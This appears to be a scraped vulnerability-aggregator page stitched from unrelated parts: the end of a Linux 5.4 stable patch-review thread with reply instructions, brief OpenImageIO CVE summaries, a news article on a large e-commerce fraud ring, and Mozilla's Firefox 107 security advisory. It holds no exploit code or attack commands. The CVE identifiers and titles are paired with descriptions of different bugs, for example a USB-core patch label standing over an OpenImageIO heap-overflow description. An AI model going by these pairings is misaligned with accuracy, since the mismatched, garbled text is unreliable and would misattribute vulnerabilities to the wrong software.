2022-09-13 14:07 \` \[PATCH 5.4 091/108\] RDMA/cma: Fix arguments order in net device validation Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 092/108\] soc: brcmstb: pm-arm: Fix refcount leak and \_\_iomem leak bugs Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 093/108\] RDMA/hns: Fix supported page size Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 094/108\] netfilter: br\_netfilter: Drop dst references before setting Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 095/108\] netfilter: nf\_conntrack\_irc: Fix forged IP logic Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 096/108\] rxrpc: Fix an insufficiently large sglist in rxkad\_verify\_packet\_2() Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 097/108\] afs: Use the operation issue time instead of the reply time for callbacks Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 098/108\] sch\_sfb: Dont assume the skb is still around after enqueueing to child Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 099/108\] tipc: fix shift wrapping bug in map\_get() Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 100/108\] i40e: Fix kernel crash during module removal Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 101/108\] RDMA/siw: Pass a pointer to virt\_to\_page() Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 102/108\] ipv6: sr: fix out-of-bounds read when setting HMAC data Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 103/108\] RDMA/mlx5: Set local port to one when accessing counters Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 104/108\] nvme-tcp: fix UAF when detecting digest errors Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 105/108\] tcp: fix early ETIMEDOUT after spurious non-SACK RTO Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 106/108\] sch\_sfb: Also store skb len before calling child enqueue Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 107/108\] x86/nospec: Fix i386 RSB stuffing Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 108/108\] MIPS: loongson32: ls1c: Fix hang during startup Greg Kroah-Hartman
2022-09-14  9:37 \` \[PATCH 5.4 000/108\] 5.4.212-rc1 review Sudip Mukherjee
2022-09-14 11:43 \` Naresh Kamboju
2022-09-14 20:19 \` Florian Fainelli
2022-09-15  0:14 \` Guenter Roeck
2022-09-17  3:06 \` zhouzhixiu

**Reply instructions:**

You may reply publicly to this message via plain-text email
using any one of the following methods:

\* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting\_style#Interleaved\_style

\* Reply using the **\--to**, **\--cc**, and **\--in-reply-to**
  switches of git-send-email(1):

  git send-email \\
    --in-reply-to=20220913140355.910732567@linuxfoundation.org \\
    --to=gregkh@linuxfoundation.org \\
    --cc=linhaoguo86@gmail.com \\
    --cc=linux-kernel@vger.kernel.org \\
    --cc=stable@vger.kernel.org \\
    --cc=stern@rowland.harvard.edu \\
    /path/to/YOUR\_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

\* If your mail client supports setting the **In-Reply-To** header
  via mailto: links, try the mailto: link

Be sure your reply has a **Subject:** header at the top and a blank line before the message body.

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.

CVE-2022-4662: [PATCH 5.4 053/108] USB: core: Prevent nested device-reset calls

A code execution vulnerability exists in the DDS scanline parsing functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially-crafted .dds can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.

CVE-2022-41838: TALOS-2022-1634 || Cisco Talos Intelligence Group

A heap out-of-bounds read vulnerability exists in the RLA format parser of OpenImageIO master-branch-9aeece7a and v2.3.19.0. More specifically, in the way run-length encoded byte spans are handled. A malformed RLA file can lead to an out-of-bounds read of heap metadata which can result in sensitive information leak. An attacker can provide a malicious file to trigger this vulnerability.

CVE-2022-36354: TALOS-2022-1629 || Cisco Talos Intelligence Group

A heap based buffer overflow vulnerability exists in the PSD thumbnail resource parsing code of OpenImageIO 2.3.19.0. A specially-crafted PSD file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.

CVE-2022-41794: TALOS-2022-1626 || Cisco Talos Intelligence Group

"Largest attack of its kind": A potent Southeast Asian e-commerce fraud ring has declared war on US retailers, targeting billions in goods in just the past month and forcing mules into its scheme.

Fraud rings don't have to fuss with all the mundane details of running a business — the scam _is_ the business.

It's that tidy business model that has enabled a new e-commerce threat group to leave its mark in November with what one researcher calls the largest attack of its kind in the past 20 years.

And they're just getting started.

The particularly prolific Southeast Asian-based e-commerce threat group has been able to build up a sophisticated operation stacked with data science, fraud detection, online payments, and e-commerce expertise that so far has enabled them to rip off an estimated $660 million in stolen laptops, cell phones, computer chips, gaming devices, and more in November, according to a new report from Signifyd researchers.

The threat actors use stolen credentials and account takeover to place orders from unsuspecting consumers' accounts, often using stored payment methods. Then, they re-ship them to Asia for repackaging and resale at a premium. According to a tandem report earlier this month on the ring, the group uses mules to do the dirty work of reshipment, often under duress.

"Additionally, if the MSHT (Modern Slavery & Human Trafficking) connections that have appeared can be confirmed, this fraud ring also manipulates people to coerce them to become part of the attack," according to that analysis, from Chargelytics Consulting.

In all, the group targeted a massive $3.3 billion worth of e-commerce merchandise during November, the busiest shopping month of the year, according Signifyd's team, which has been following the group's illicit activities for more than a year.

**Holiday Season Scam 'War'**

"What was unique about this fraud ring was that they revved up really quickly. They're fast and strong," said Ping Li, Signifyd vice president of risk and chargeback operations at Signifyd, in its report this week. "They probably had been preparing for it for a long time, and then they launched a war just before our holiday season."

Li, who has studied how to stop e-commerce fraud for two decades, ranks this attack as the most dangerous she's ever seen, because of its ability to attempt large numbers of fraudulent transactions per minute, which in one case Signifyd analysts observed kept up for a full day.

"Normally, when we see an attack on one merchant, the attack has its own characteristics. And then you see a very different kind of attack on another merchant," Li said. "But this one is just universal. It's everywhere. This is the first time I have seen an attack of this size and scale in our network."

The scammers are also apparently not concerned about being caught. "They kind of leave their signature," Li said. "They are not really trying to hide. It's like, 'Catch me if you can.'"

**Excellence in E-Commerce Fraud**

Besides the operation being stacked with technology know-how, Michael Pezely, Signifyd's director of risk intelligence, tells Dark Reading that the e-commerce threat group has sheer speed and volume of scam transactions on its side.

"E-commerce orders — particularly at the enterprise level — arrive at dizzying speed," Pezely says. "Signifyd, for instance, processed as much as $42 million an hour in orders during Cyber Week. It would be virtually impossible for a human team to review that volume of orders for signs of fraud."

Pezely added that merchants are on the lookout for goods being shipped to a foreign country, but this group of scammers places orders that appear to originate from the US and ship to US addresses.

"Furthermore, if a merchant is relying on only its own transaction data, there likely will be a lag between the time a fraud attack begins and when it is recognized," Pezely explains. "Without having the benefit of seeing millions of transactions across thousands of merchants, a novel fraud attack might not be in plain sight for some time."

**Automation Is Part of the Answer**

His recommendation to e-commerce security teams is that they need to rely on a combination of automation and machine learning informed by patterns across the broader online retail sector.

"And so, automation is part of the answer — in particular, machine learning solutions that are able to recognize patterns and associate them with known bad actors and bad events, while constantly improving their performance to suppress new attacks," Pezely explains.

He adds, "To be effective, teams also need to rely on large networks of many merchants, which provide the transaction intelligence that allows machine learning models to identify attack patterns at one merchant and adjust protection across the network to avoid losses among other merchants on the network."

Once the models are created, it's up to human expertise to put the data together and create a plan for cyber-defense.

Merchants would do well to get ahead of the threat, given the billions of dollars in goods already in the crosshairs of this lone e-commerce fraud ring, Pezely advises.

"Given that a fraud ring's cost of inventory is zero, there is plenty of room to plot future endeavors," he says.

Inside the Next-Level Fraud Ring Scamming Billions Off Holiday Retailers

When downloading an HTML file, if the title of the page was formatted as a filename with a malicious extension, Firefox may have saved the file with that extension, leading to possible system compromise if the downloaded file was later ran. This vulnerability affects Firefox < 107.

**Mozilla Foundation Security Advisory 2022-47**

Announced

November 15, 2022

Impact

high

Products

Firefox

Fixed in

*   Firefox 107

This advisory was updated December 13, 2022 to add CVE-2022-46882 and CVE-2022-46883. Both fixes were included in the original release of Firefox 107, but did not appear in the advisory published at that time.

**#CVE-2022-45403: Service Workers might have learned size of cross-origin media files**

Reporter

Anne van Kesteren and Karl Tomlinson

Impact

high

**Description**

Service Workers should not be able to infer information about opaque cross-origin responses; but timing information for cross-origin media combined with Range requests might have allowed them to determine the presence or length of a media file.

**References**

*   Bug 1762078

**#CVE-2022-45404: Fullscreen notification bypass**

Reporter

Irvan Kurniawan

Impact

high

**Description**

Through a series of popup and window.print() calls, an attacker can cause a window to go fullscreen without the user seeing the notification prompt, resulting in potential user confusion or spoofing attacks.

**References**

*   Bug 1790815

**#CVE-2022-45405: Use-after-free in InputStream implementation**

Reporter

Atte Kettunen

Impact

high

**Description**

Freeing arbitrary nsIInputStream's on a different thread than creation could have led to a use-after-free and potentially exploitable crash.

**References**

*   Bug 1791314

**#CVE-2022-45406: Use-after-free of a JavaScript Realm**

Reporter

Samuel Groß

Impact

high

**Description**

If an out-of-memory condition occurred when creating a JavaScript global, a JavaScript realm may be deleted while references to it lived on in a BaseShape. This could lead to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1791975

**#CVE-2022-45407: Loading fonts on workers was not thread-safe**

Reporter

Armin Ebert

Impact

high

**Description**

If an attacker loaded a font using FontFace() on a background worker, a use-after-free could have occurred, leading to a potentially exploitable crash.

**References**

*   Bug 1793314

**#CVE-2022-45408: Fullscreen notification bypass via windowName**

Reporter

Irvan Kurniawan

Impact

high

**Description**

Through a series of popups that reuse windowName, an attacker can cause a window to go fullscreen without the user seeing the notification prompt, resulting in potential user confusion or spoofing attacks.

**References**

*   Bug 1793829

**#CVE-2022-45409: Use-after-free in Garbage Collection**

Reporter

Gary Kwong

Impact

high

**Description**

The garbage collector could have been aborted in several states and zones and GCRuntime::finishCollection may not have been called, leading to a use-after-free and potentially exploitable crash

**References**

*   Bug 1796901

**#CVE-2022-45410: ServiceWorker-intercepted requests bypassed SameSite cookie policy**

Reporter

Dongsung Kim

Impact

moderate

**Description**

When a ServiceWorker intercepted a request with FetchEvent, the origin of the request was lost after the ServiceWorker took ownership of it. This had the effect of negating SameSite cookie protections. This was addressed in the spec and then in browsers.

**References**

*   Bug 1658869

**#CVE-2022-45411: Cross-Site Tracing was possible via non-standard override headers**

Reporter

scarlet

Impact

moderate

**Description**

Cross-Site Tracing occurs when a server will echo a request back via the Trace method, allowing an XSS attack to access to authorization headers and cookies inaccessible to JavaScript (such as cookies protected by HTTPOnly). To mitigate this attack, browsers placed limits on fetch() and XMLHttpRequest; however some webservers have implemented non-standard headers such as X-Http-Method-Override that override the HTTP method, and made this attack possible again. Firefox has applied the same mitigations to the use of this and similar headers.

**References**

*   Bug 1790311

**#CVE-2022-45412: Symlinks may resolve to partially uninitialized buffers**

Reporter

Armin Ebert

Impact

moderate

**Description**

When resolving a symlink such as file:///proc/self/fd/1, an error message may be produced where the symlink was resolved to a string containing unitialized memory in the buffer.  
_This bug only affects Firefox on Unix-based operated systems (Android, Linux, MacOS). Windows is unaffected._

**References**

*   Bug 1791029

**#CVE-2022-45413: SameSite=Strict cookies could have been sent cross-site via intent URLs**

Reporter

Axel Chong

Impact

moderate

**Description**

Using the S.browser_fallback_url parameter parameter, an attacker could redirect a user to a URL and cause SameSite=Strict cookies to be sent.  
_This issue only affects Firefox for Android. Other operating systems are not affected._

**References**

*   Bug 1791201

**#CVE-2022-40674: Use-after-free vulnerability in expat**

Reporter

Rhodri James

Impact

moderate

**Description**

A flaw in XML parsing could have led to a use-after-free causing a potentially exploitable crash.  
_In official releases of Firefox this vulnerability is mitigated by wasm sandboxing; versions managed by Linux distributions may have other settings._

**References**

*   Bug 1791598

**#CVE-2022-45415: Downloaded file may have been saved with malicious extension**

Reporter

Jefferson Scher and Jayateertha Guruprasad

Impact

moderate

**Description**

When downloading an HTML file, if the title of the page was formatted as a filename with a malicious extension, Firefox may have saved the file with that extension, leading to possible system compromise if the downloaded file was later ran.

**References**

*   Bug 1793551

**#CVE-2022-45416: Keystroke Side-Channel Leakage**

Reporter

Erik Kraft, Martin Schwarzl, and Andrew McCreight

Impact

moderate

**Description**

Keyboard events reference strings like "KeyA" that were at fixed, known, and widely-spread addresses. Cache-based timing attacks such as Prime+Probe could have possibly figured out which keys were being pressed.

**References**

*   Bug 1793676

**#CVE-2022-45417: Service Workers in Private Browsing Mode may have been written to disk**

Reporter

Kagami

Impact

moderate

**Description**

Service Workers did not detect Private Browsing Mode correctly in all cases, which could have led to Service Workers being written to disk for websites visited in Private Browsing Mode. This would not have persisted them in a state where they would run again, but it would have leaked Private Browsing Mode details to disk.

**References**

*   Bug 1794508

**#CVE-2022-45418: Custom mouse cursor could have been drawn over browser UI**

Reporter

Hafiizh

Impact

moderate

**Description**

If a custom mouse cursor is specified in CSS, under certain circumstances the cursor could have been drawn over the browser UI, resulting in potential user confusion or spoofing attacks.

**References**

*   Bug 1795815

**#CVE-2022-46882: Use-after-free in WebGL**

Reporter

Irvan Kurniawan

Impact

moderate

**Description**

A use-after-free in WebGL extensions could have led to a potentially exploitable crash.  
_Note_: This advisory was added on December 13th, 2022 after we better understood the impact of the issue. The fix was included in the original release of Firefox 107.

**References**

*   Bug 1789371

**#CVE-2022-45419: Deleting a security exception did not take effect immediately**

Reporter

Ronald Crane

Impact

low

**Description**

If the user added a security exception for an invalid TLS certificate, opened an ongoing TLS connection with a server that used that certificate, and then deleted the exception, Firefox would have kept the connection alive, making it seem like the certificate was still trusted.

**References**

*   Bug 1716082

**#CVE-2022-45420: Iframe contents could be rendered outside the iframe**

Reporter

Suhwan Song of SNU CompSec Lab

Impact

low

**Description**

Using tables inside of an iframe, an attacker could have caused iframe contents to be rendered outside the boundaries of the iframe, resulting in potential user confusion or spoofing attacks.

**References**

*   Bug 1792643

**#CVE-2022-45421: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5**

Reporter

Mozilla developers

Impact

high

**Description**

Mozilla developers Andrew McCreight and Gabriele Svelto reported memory safety bugs present in Firefox 106 and Firefox ESR 102.4. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5

**#CVE-2022-46883: Memory safety bugs fixed in Firefox 107**

Reporter

Mozilla developers

Impact

high

**Description**

Mozilla developers Gabriele Svelto, Yulia Startsev, Andrew McCreight and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 106. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.  
_Note_: This advisory was added on December 13th, 2022 after discovering it was inadvertently left out of the original advisory. The fix was included in the original release of Firefox 107.

**References**

*   Memory safety bugs fixed in Firefox 107

Tag

#mac